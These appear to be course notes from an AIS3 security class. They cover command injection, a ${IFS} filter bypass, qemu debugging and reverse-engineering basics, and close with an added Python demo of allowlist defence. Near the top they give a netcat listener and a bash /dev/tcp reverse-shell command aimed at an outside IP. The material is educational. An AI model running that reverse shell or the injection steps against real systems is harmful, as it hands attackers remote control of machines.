AIS3 180801
===
###### tags: `AIS3` `notes`

## IoT / Web Vuln

### Local Proxy
- Burp

### Command Injection - reverse shell
```shell
# Open a port to listen
nc -vv -l 8080
# Get a remote shell (the listener's IP/port are placeholders)
bash -i >& /dev/tcp/87.87.87.87/8080 0>&1
```
Ref http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

#### Combined technique
1. First point the app/browser at a proxy you run yourself (Burp)
2. Intercept the requests with Burp and tamper with the parameters
3. Test for Command Injection
4. Profit

### Bypass
- Whitespace: `${IFS}` (Bash Internal Field Separator)

### ???
- qemu-master
- MIPS
```shell
# chroot's argument after the directory is the command to run inside it;
# here that is the qemu-user static binary for the target arch (e.g. MIPS)
sudo chroot . [qemu-user static binary] -g [port] [program name]
# -g makes qemu-user wait for a gdb-protocol debugger on [port]; attach IDA Pro remotely
```

## Reverse Engineering
> 'Cyber Attack' -- Asuka Nakajima

### Register
- Segment registers (ss, cs, ds, es, fs, gs)
- SSE, MMX, FPU, debug

### Calling Convention
1. stdcall
    - Win32 API
    - Callee cleans the stack (MSVC)
2. thiscall
3. fastcall
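Worked example for the Command Injection and `${IFS}` bypass notes above. This is an added example, not code from the original notes or the AIS3 lecture. It shows, from the defender's side, why a filter that only rejects literal whitespace does not stop `${IFS}` (the shell expands it and then field-splits it into a word separator), and why the fix is to never hand user input to a shell: validate against an allowlist and call the program with an argv list. The inputs are constructed; `echo host` stands in for whatever real tool (ping, nslookup, ...) the application would invoke, so the demo runs harmlessly offline.

```python
import re
import subprocess

# Constructed sample inputs (not from the original notes): a benign hostname
# and two injection attempts, the second using ${IFS} instead of the space
# that a naive whitespace filter would reject.
BENIGN_HOST = "example.com"
SPACE_PAYLOAD = "example.com; echo INJECTED"
IFS_PAYLOAD = "example.com;echo${IFS}INJECTED"

# Allowlist: only characters a hostname can contain (assumed policy for the demo).
HOSTNAME_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")


def whitespace_denylist_allows(value):
    """The weak check: rejects literal whitespace and nothing else."""
    return re.search(r"\s", value) is None


def hostname_allowlist_allows(value):
    """The hardened check: accept only what a hostname may look like."""
    return HOSTNAME_RE.fullmatch(value) is not None


def run_via_shell(value):
    """Vulnerable pattern: user input concatenated into a shell command line.
    Returns the shell's stdout. 'echo host' stands in for the real tool."""
    completed = subprocess.run(["sh", "-c", "echo host " + value],
                               capture_output=True, text=True)
    return completed.stdout


def run_via_argv(value):
    """Hardened pattern: allowlist-validate, then exec with an argv list and
    no shell, so metacharacters and ${IFS} are never interpreted.
    Returns None when the allowlist rejects the input."""
    if not hostname_allowlist_allows(value):
        return None
    completed = subprocess.run(["echo", "host", value],
                               capture_output=True, text=True)
    return completed.stdout


def injected(output):
    """True if the injected command actually ran: its marker appears as its own line."""
    return "INJECTED" in output.splitlines()


if __name__ == "__main__":
    for payload in (BENIGN_HOST, SPACE_PAYLOAD, IFS_PAYLOAD):
        passes_denylist = whitespace_denylist_allows(payload)
        print(f"{payload!r}: denylist allows={passes_denylist}, "
              f"allowlist allows={hostname_allowlist_allows(payload)}")
        if passes_denylist:
            # Only inputs the weak filter lets through reach the shell.
            print("  shell run injected:", injected(run_via_shell(payload)))
        print("  argv run output:", run_via_argv(payload))
```

Running it shows the `${IFS}` payload passing the whitespace denylist and executing the second command when the input reaches `sh -c`, while the same payload is rejected by the allowlist before `run_via_argv` ever calls `echo`. The allowlist is the real fix; the argv list is defence in depth, since even an input that slips past validation is then just an argument, not shell syntax.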